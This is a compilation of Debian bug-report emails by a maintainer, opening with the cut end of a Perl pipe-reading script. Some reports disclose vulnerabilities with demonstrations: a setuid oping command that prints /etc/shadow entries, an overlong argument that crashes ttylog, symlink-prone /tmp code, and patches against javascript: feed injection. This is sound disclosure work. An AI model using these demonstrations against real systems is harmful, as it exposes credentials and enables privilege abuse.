open( CMD, "/bin/ls /etc/|" )
  or die "2. failed: $!";
binmode(CMD, ":utf8");
while( my $line =  )
{
print "\t$line" if ( $line =~ /(motd|group)$/ );
}
close( CMD );


#
#  3.  Use a handle, as God intended.
#
print "3.  Open a handle.\n";
open my $handle, "-|", "/bin/ls /etc"
  or die "Failed : $!\n";
while( my $line = <$handle> )
{
print "\t$line" if ( $line =~ /(motd|group)$/ );
}
close( $handle );


#
#  4.  Open a handle, use binmode
#
print "4.  Open a handle.  binmode\n";
open $handle, "-|", "/bin/ls /etc"
  or die "Failed: $!\n";
binmode( $handle, ":utf8" );
while( my $line = <$handle> )
{
print "\t$line" if ( $line =~ /(motd|group)$/ );
}
close( $handle );


#
#  5.  Last ditch
#
print "5.  Last ditch.\n";
open $handle, "-|:utf8", "/bin/ls /etc"
  or die "Failed: $!\n";
while( my $line = <$handle> )
{
print "\t$line" if ( $line =~ /(motd|group)$/ );
}
close( $handle );

Bug#566714: ITP: xen-tools -- Tools to manage Xen virtual servers

[Steve Kemp]

On Sun Jan 24, 2010 at 19:25:07 +0100, Axel Beckert wrote:

> I know that upstream stopped development since Steve doesn't use
> xen-tools (nor xen) anymore.

  FWIW I support this ITP.

  I will be happy to "give away" the code - such that this fork
 becomes official, and all existing references to the project point
 there.

Steve
--



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#565358: redis-server: Please consider adding command line completion to redis-cli

[Steve Kemp]

Package: redis-server
Version: 2:1.2.0-1
Severity: wishlist
Tags: +patch

*** Please type your report below this line ***

  It would be useful to add a simple bash completion script to this
 package to ease use - as the manpage doesn't list options.

  Sample script attached below which you're welcome to use if you
 don't have the time/patience to write a better one.


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-trunk-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages redis-server depends on:
ii  adduser   3.112  add and remove users and groups
ii  libc6 2.10.2-5   Embedded GNU C Library: Shared lib

redis-server recommends no packages.

redis-server suggests no packages.

-- no debconf information


# /etc/bash_completion.d/redis-cli.steve  # -*- sh -*-
#
# Bash completion function for the 'redis-cli' command.
#
# Steve
# --
# http://www.steve.org.uk
#


_redis-cli()
{
COMPREPLY=()
cur=${COMP_WORDS[COMP_CWORD]}
prev=${COMP_WORDS[COMP_CWORD-1]}

#
#  All known commands accepted.  Sorted.
#
opts='bgrewriteaof bgsave dbsize debug decr decrby del echo exists expire 
expireat flushall flushdb get getset incr incrby info keys lastsave lindex llen 
lpop lpush lrange lrem lset ltrim mget move mset msetnx ping randomkey rename 
renamenx rewriteaof rpop rpoplpush rpush sadd save scard sdiff sdiffstore 
select set setnx shutdown sinter sinterstore sismember slaveof smembers smove 
sort spop srandmember srem sunion sunionstore ttl type zadd zcard zincrby 
zrange zrangebyscore zrem zremrangebyscore zrevrange zscore'

#
#  Only copmlete on the first term.
#
if [ $COMP_CWORD -eq 1 ]; then
COMPREPLY=( $(compgen -W "${opts}" -- ${cur}) )
return 0
fi

}
complete -F _redis-cli redis-cli


--
Steve
--



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#555272: jquery: embeds prototype.js

[Steve Kemp]

  The package does include a copy of the prototype library, but it is
 only used to run the integrated test-suite and is thus not a concern.

  It is not included in the binary package, just there for a maintainer
 who wants to fiddle with the package.

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#562623: Closing as directed

[Steve Kemp]

  [Closing as directed]

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#524772: Looks like this can be closed

[Steve Kemp]

  Now that we're on 0.83 it looks like this bug may be closed ..?

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#562684: ITP: libtext-vimcolor-perl -- syntax color text in HTML or XML using Vim

[Steve Kemp]

Package: wnpp
Owner: Steve Kemp 
Severity: wishlist

*** Please type your report below this line ***

* Package name: libtext-vimcolor-perl
  Version : 0.11
  Upstream Author : Geoff Richards 
* URL : http://search.cpan.org/dist/Text-VimColor/
* License : Perl License
  Programming Lang: Perl
  Description : syntax color text in HTML or XML using Vim

 Text::VimColor tries to markup text files according to their syntax. It can
 be used to produce web pages with pretty-printed colourful source code
 samples. It can produce output in the following formats:





-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#561666: RM: xen-shell -- ROM; Obsolete - not supported

[Steve Kemp]

Package: ftp.debian.org
Severity: normal

*** Please type your report below this line ***

  Please remove from unstable release.



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#561667: RM: xen-tools -- ROM; obsolete, unsupported.

[Steve Kemp]

Package: ftp.debian.org
Severity: normal


*** Please type your report below this line ***

  Please remove from unstable.




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#553948: winkeydaemon: Symlink attack allows creation of arbitrary files

[Steve Kemp]

Package: winkeydaemon
Version: 1.0.1-3
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

  This is probably not a hugely exploitable issue, but reporting
 regardless:

 winkeydaemon.pl:

if (-d "/tmp/.winkey") {
# ok, no action required
} else {
my $dir = "/tmp/.winkey";
`mkdir "$dir"`;
if ($debug) {print "Arranging mutex directory\n";}
}
...
...
`touch /tmp/.winkey/keyer_busy`;
...
`rm /tmp/.winkey/keyer_busy`;
...


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages winkeydaemon depends on:
ii  libdevice-serialport-perl 1.04-2+b1  emulation of Win32::SerialPort for

winkeydaemon recommends no packages.

winkeydaemon suggests no packages.



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#553945: ttylog: Doesn't test length of device.

[Steve Kemp]

Package: ttylog
Version: 0.1.c-1
Severity: normal

*** Please type your report below this line ***

  The script uses strcpy to copy the specified device
 name into a fixed buffer.

  This program isn't a security-sensitive one so the
 issue is minor, but the bug should be fixed:

 s...@gold:$  /usr/sbin/ttylog  -d `perl -e 'print "X"x3000'`
 Segmentation fault

  Patch included to turn this into:

 (139) s...@gold:/tmp/foo/ttylog-0.1.c$ ./ttylog  -d `perl -e 'print
 "X"x3000'`
 ./ttylog: invalid device
 
XXX



--- ttylog.c.orig   2009-11-02 11:09:39.0 +
+++ ttylog.c2009-11-02 11:10:25.0 +
@@ -79,7 +79,9 @@
{
  if (argv[i + 1] != NULL)
{
- strcpy (modem_device, argv[i + 1]);
+  memset( modem_device, '\0', sizeof(modem_device));
+ strncpy (modem_device, argv[i + 1],sizeof(modem_device)-1);
+
}
  else
{


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages ttylog depends on:
ii  libc6 2.10.1-4   GNU C Library: Shared libraries

ttylog recommends no packages.

ttylog suggests no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#524772: Finish supporting prefork

[Steve Kemp]

> 0.81-1 included prefork, which was usable via editing the init.d script, but
> couldn't be selected through debconf, because prefork didn't as of 0.81
> support listening on multiple interfaces, and hence would have broken some
> deployed setups.

  The current release is 0.83, and the changelog for 0.82 includes these
 entries:

  40   prefork: support --listen-address for consistency with forkserver
  35   prefork: add multi-address support
  33   prefork: Fix startup when no interface addresses are specified (Devin 
Carraway)

  ChangeLog here:
http://git.develooper.com/?p=qpsmtpd.git;a=blob;f=Changes;hb=HEAD


Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#548684: oping allows reading arbitrary files upon the local system - security issue

[Steve Kemp]

Package: oping
Version: 1.3.2-1
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

 oping is setuid root and one of the command line arguments allows
 a configuration file to be specified.  This file is read and *reported*
 to the console.  (Unless the file contains contents which can be
 interpreted as a list of hostnames!)

 For example:

 s...@gold:~$ oping  -f /etc/shadow
 Adding host `root:$1eluded/value:14368:0:9:7:::' failed: getaddrinfo: Name 
or service not known
 Adding host `daemon:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `bin:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `sys:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `sync:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known
 Adding host `games:*:13876:0:9:7:::' failed: getaddrinfo: Name or service 
not known

  This is clearly a security hole - however the good news is that the
 version(s) of oping included in lenny and etch are unaffected.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages oping depends on:
ii  libc6 2.9-26 GNU C Library: Shared libraries
ii  liboping0 1.3.2-1C/C++ library to generate ICMP ECH

oping recommends no packages.

oping suggests no packages.

-- no debconf information



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

[Steve Kemp]

On Fri Sep 18, 2009 at 14:06:44 +0200, Arnaud Fontaine wrote:

> No I didn't, I could not find this discussion, could you please point it
> me out?   As soon as all these  issues will have been  addressed, I will
> prepare  a  package (debian-security  team:  please  do  not upload  the
> package for now).

 Basically it comes down to CDATA and the handling of 

 This is the comment I received:

--
 please find attached the two reproducers for the CDATA thing. poc1.xml
 is not correctly filtered while poc2.xml is filtered, although they are
 nearly identical.

 If you edit the newly patched function to print the k and v values,
 you'll see that the attributes aren't passed through.
--

Steve
--


poc1.xml
Description: XML document


poc2.xml
Description: XML document

Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

[Steve Kemp]

On Fri Sep 18, 2009 at 13:38:39 +0200, Arnaud Fontaine wrote:

> I have prepared  yesterday a package for Lenny  including this patch. At
> the moment, I'm waiting for a reply from the debian-security team.

  Great.  Don't forget etch to.

> Thank you very much for the patch and bug report.

  Did you see the followup discussion from Secunia about another
 planet-problem, relating to the handling of CDATA ?

  (To be honest if I were to re-do the patch now I'd probably
 do it the other way round : Make sure "src"starts with http:
 to cover other cases too.)

Steve
--




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#546178: Updated patch

[Steve Kemp]

  The patch doesn't account for case variations, so it shold be updated:

+
+for i in xrange (len (attrs)):
+k,v = attrs[i]
+if (( k == "src" ) or ( k == "href" ) ) and 
(v.lower().find("javascript:" ) <> -1 ):
+del attrs[i]
+
 return attrs

Steve
--
http://www.steve.org.uk/



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds

[Steve Kemp]

Subject: planet: [CVE-2009-2937] - Insufficient escaping of input feeds
Package: planet
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The planet feed aggregator attempts to remove malicious content from
user-submitted feeds.  It does a great job, but fails to sanitize
this input:

  

At least Opera will execute this code.

The packages in Etch and Lenny are vulnerable and should require a
security update.  Fixed packages are available from:

 http://www.steve.org.uk/tmp/planet/etch/
+
 http://www.steve.org.uk/tmp/planet/lenny/

This is the patch I used:

--- planet-2.0.orig/planet/sanitize.py
+++ planet-2.0/planet/sanitize.py
@@ -70,6 +70,12 @@
 # utility method to be called by descendants
 attrs = [(k.lower(), v) for k, v in attrs]
 attrs = [(k, k in ('rel', 'type') and v.lower() or v) for k, v in 
attrs]
+
+for i in xrange (len (attrs)):
+k,v = attrs[i]
+if (( k == "src" ) or ( k == "href" ) ) and (v.find("javascript:" 
) <> -1 ):
+del attrs[i]
+
 return attrs

 def unknown_starttag(self, tag, attrs):


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#546179: planet-venus: [CVE-2009-2937] - Insufficient escaping of input feeds

[Steve Kemp]

Subject: planet-venus: [CVE-2009-2937] - Insufficient escaping of input feeds
Package: planet-venus
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The planet feed aggregator attempts to remove malicious content from
user-submitted feeds.  It does a great job, but fails to sanitize
this input:

  

At least Opera will execute this code.

The package in Lenny is vulnerable and should require a
security update.  Fixed packages are available from:

 http://www.steve.org.uk/tmp/planet/lenny/

This is the patch I used, written by upstream:

s...@senfl:~$ diff --unified scrub.orig scrub.py
--- scrub.orig  2009-09-09 16:24:50.0 +
+++ scrub.py2009-09-09 16:25:18.0 +
@@ -128,5 +128,13 @@
 node['value'] = feedparser._resolveRelativeURIs(
 node.value, node.base, 'utf-8', node.type)

-node['value'] = feedparser._sanitizeHTML(
-node.value, 'utf-8', node.type)
+# Run this through HTML5's serializer
+from html5lib import html5parser, sanitizer, treebuilders
+from html5lib import treewalkers, serializer
+p = html5parser.HTMLParser(tokenizer=sanitizer.HTMLSanitizer,
+  tree=treebuilders.getTreeBuilder('dom'))
+doc = p.parseFragment(node.value, encoding='utf-8')
+xhtml = serializer.XHTMLSerializer(inject_meta_charset = False)
+walker = treewalkers.getTreeWalker('dom')
+tree = xhtml.serialize(walker(doc), encoding='utf-8')
+node['value'] = ''.join([str(token) for token in tree])


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#545198: Use of uninitialized value

[Steve Kemp]

On Sat Sep 05, 2009 at 18:41:36 +0200, Guido G??nther wrote:

> $ chronicle
>   Use of uninitialized value $site
>   in concatenation (.) or string at /usr/bin/chronicle line 1613.

> Use of uninitialized value $site
>   in concatenation (.) or string at /usr/bin/chronicle line 1638.

> at me. The generated entries look o.k. though.

  This is caused by some new code which generates a file called
 sitemap.xml beneath your output directory.

  I guess this can only happen if you didn't pass a
 --url_prefix argument when building.

  (Or have one defined in your configuration file, if you're using
 one.)

  Apart from the sitemap.xml file being full of bogus entries, and
 the unpleasant warnings, this shouldn't cause any harm.

  Regardless I'll roll out a new update to skip the sitemap if there
 is no URL prefix supplied which should fix this bug.


Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#535481: offlineimap: Error at installation time

[Steve Kemp]

Package: offlineimap
Version: 6.1.0
Severity: important


  The upgrade today resulted in this:

Setting up libgail-common (2.16.4-1) ...
Setting up gtk2-engines-pixbuf (2.16.4-1) ...
Setting up libgtk2.0-bin (2.16.4-1) ...
Setting up offlineimap (6.1.0) ...
Setting up python-gdbm (2.5.2-1.1) ...
Processing triggers for python-support ...
Compiling /usr/lib/pymodules/python2.4/offlineimap/accounts.py ...
  File "/usr/lib/pymodules/python2.4/offlineimap/accounts.py", line 84
yield (folder, quick)
SyntaxError: 'yield' not allowed in a 'try' block with a 'finally' clause

  It seemed to be harmless but that might just be a lucky accident..


-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages offlineimap depends on:
ii  python2.5.4-2An interactive high-level object-o
ii  python-support1.0.3  automated rebuilding support for P

offlineimap recommends no packages.

Versions of packages offlineimap suggests:
pn  python-kerberos(no description available)

-- no debconf information



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#531456: ITP: libmoose-policy-perl -- module to specify your project-wide or even company-wide Moose meta-policy

[Steve Kemp]

On Mon Jun 01, 2009 at 19:19:28 +0200, Salvatore Bonaccorso wrote:

>  This is still an release of this module and it should not be considered to be
>  complete by any means. It is very basic implemenation at this point and will

  "implementation" would fix that typo.

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#530615: ITP: libfile-temp-perl -- return name and handle of a temporary file safely

[Steve Kemp]

On Tue May 26, 2009 at 08:11:06 -0300, Brian Cassidy wrote:

> * Package name: libfile-temp-perl
>   Version : 0.21
>   Upstream Author : Tim Jenness 
> * URL : http://search.cpan.org/dist/File-Temp/
> * License : Artistic | GPL-1+
>   Programming Lang: Perl
>   Description : return name and handle of a temporary file safely
>
> File::Temp can be used to create and open temporary files in a safe way.

  This module is already packaged:

  sh-3.2$ ls /usr/share/perl/5.10.0/File/Temp.pm 
  /usr/share/perl/5.10.0/File/Temp.pm

  sh-3.2$ dpkg --search /usr/share/perl/5.10.0/File/Temp.pm
  perl-modules: /usr/share/perl/5.10.0/File/Temp.pm

  Did you miss this, or is it being removed from perl-modules?

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#526228: fixed in jquery 1.3.3-1

[Steve Kemp]

On Wed May 20, 2009 at 11:56:25 +0200, Steve Langasek wrote:

> >[ Steve Kemp ]
> >* Re-upload with orig.tar.gz file present, unfortunately this means
> >  bumping the release number, but that is a small price to pay.
> >  (Closes: #526228)
>
> Hrm - shouldn't have been.  The archive will accept a newly-added
> 1.3.2.orig.tar.gz just fine - it just doesn't accept a new version of a
> previously-existing file.
>
> Oh well :)

  Oops.  I was pondering it for a little while and in the end decided
 that a missing .orig.tar.gz would mean that any upload with one present
 would result in a ".orig.tar.gz doesn't match" which would cause
 failure.

  Perhaps not the best way to handle this bug, but at the same
 time not a horrible one.  It just means the next release will
 need a bit of juggling - although hopefully not too much as the
 next release will jump version number anyway :)


Steve
--



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#526047: [namecheck]: pod documentation formating

[Steve Kemp]

On Wed Apr 29, 2009 at 17:00:21 +0100, Adam D. Barratt wrote:

> The patch looks fine to me; thanks.  As we're not upstream for the
> script, I've BCCed the original author to make him aware of the patch,
> and in case he has any issues / comments with it.

  Thanks for the notification, the patch looks fine to me, and I've
 applied it to the original source now:

http://mybin.repository.steve.org.uk/?rev/1a71a27bec53

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#519339: ITP: tmux -- an alternative to screen, licensed under 3-BSD

[Steve Kemp]

On Thu Mar 12, 2009 at 22:37:41 +0100, Karl Ferdinand Ebert wrote:

> - a more usable status line syntax, with the ability to display the first line
>   of output of a specific command;

  That is also possible in GNU Screen.

> - a cleaner, modern, easily extended, BSD-licensed codebase.

  That would be a nice bonus.  Frankly the GNU Screen codebase
 is very messy.  (I've worked with it a fair bit.)

> > The design of tmux seems less secure, too.
>
> In which way is it less secure?

  I've not looked at this at all -  but the idea of shared sockets
 in /tmp which I recall from a previous message in the thread jumped out
 at me as being a recipe for symlink attacks, if nothing else.

Steve
-- 
Try out tscreen - My fork of GNU Screen:
http://www.steve.org.uk/Software/tscreen



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#518122: Acknowledgement (Security issue in mantis)

[Steve Kemp]

  Looks like I filed this too soon - the bug is fixed in Lenny's
 package already.

Steve
-- 



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#518122: Security issue in mantis

[Steve Kemp]

Package: mantis
Severity: grave
Tags: security
Version: 1.1.6+dfsg-2

  There's a security issue in the mantis version in lenny, at least,
 which allows registered users to run commands on the server.

  Details here:

http://secunia.com/advisories/32314/

  Patch here:


http://mantisbt.svn.sourceforge.net/viewvc/mantisbt/branches/BRANCH_1_1_0/mantisbt/core/utility_api.php?r1=5679&r2=5678&pathrev=5679

Steve
-- 
Stop blog&forum spam
http://blogspam.net/



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#515762: ITP: libjs-jqueryui -- jQuery UI provides abstractions for low-level interaction and animation, advanced effects and high-level, themeable widgets, built on top of the jQuery JavaScript Li

[Steve Kemp]

On Tue Feb 17, 2009 at 11:52:10 -0300, Walter Cruz wrote:

> >  a.  renamed to be libjs-jquery-ui
> 
> Should I fill another ITP?

   I think there's no need, just rename the package prior to the
  upload.  I don't think people would get too pedantic if you were
  changing the name to fit in with existing package names.

> >  b.  Hosted in the javascript git repository.
> 
> Will talk with the js team.

  Great, thanks very much!

Steve
-- 



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#515762: ITP: libjs-jqueryui -- jQuery UI provides abstractions for low-level interaction and animation, advanced effects and high-level, themeable widgets, built on top of the jQuery JavaScript Li

[Steve Kemp]

On Tue Feb 17, 2009 at 11:36:11 -0300, Walter Cruz wrote:

> * Package name: libjs-jqueryui
>   Version : 1.5.3
>   Upstream Author : Paul Bakaus 
> * URL : http://jqueryui.com/
> * License : GPL, MIT/X
>   Programming Lang: JavaScript
>   Description : jQuery UI provides abstractions for low-level interaction 
> and animation, advanced effects and high-level, themeable widgets, built on 
> top of the jQuery JavaScript Library, that you can use to build highly 
> interactive web applications.

  Would be nice if this were:

  a.  renamed to be libjs-jquery-ui

  b.  Hosted in the javascript git repository.

  See the jquery source package for details:
http://packages.debian.org/source/sid/jquery

Steve
-- 
Managed Anti-Spam Service
http://mail-scanning.com/




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#493719: Confirming 493719

[Steve Kemp]

On Wed Jan 21, 2009 at 14:22:37 +, brian m. carlson wrote:

>>  Brian are you able to test the package uploaded to experimental,
>> version 1.5.19-1?
>
> Yes.

  Great, thanks!

>>  That has had a couple of minor IMAP changes relating to handling
>> NULL pointers, and I'd be curious to know if these changes fix
>> the bug..
>
> The problem still occurs. 

  Not quite so great, but definitely useful to know so thanks for
 testing.

> The way I reproduced it is to leave mutt
> open and connected to the server whilst I suspended the machine.

  I don't really use IMAP much, but I have a notebook and I will try
 to reproduce over the weekend.

> I also found another bug with the version in experimental; I'll report
> that next.

  :)

Steve
-- 
Stop blog&forum spam
http://blogspam.net/



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#509980: mutt: Mail-Followup-To removed when recalling postponed messages

[Steve Kemp]

  This bug is a duplicate of 482883:

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=482883
"mutt: removes custom headers on postpone+resume"

  I will merge the two bugs together for improved tracking.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Bug#509581: $sendmail option unconditionally and wrongly uses --

[Steve Kemp]

  The patch below might prevent this from happening.

s...@gold:~/git/mutt/mutt-1.5.19$ diffs
--- sendlib.c-orig  2009-01-20 22:57:28.0 +
+++ sendlib.c   2009-01-20 22:57:57.0 +
@@ -2206,7 +2206,11 @@
 args = add_option (args, &argslen, &argsmax, "-R");
 args = add_option (args, &argslen, &argsmax, DsnReturn);
   }
+  if ( strstr( args, "--" ) == NULL )
+  {
+/* Only append "--" if not already present. */
   args = add_option (args, &argslen, &argsmax, "--");
+  }
   args = add_args (args, &argslen, &argsmax, to);
   args = add_args (args, &argslen, &argsmax, cc);
   args = add_args (args, &argslen, &argsmax, bcc);


Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org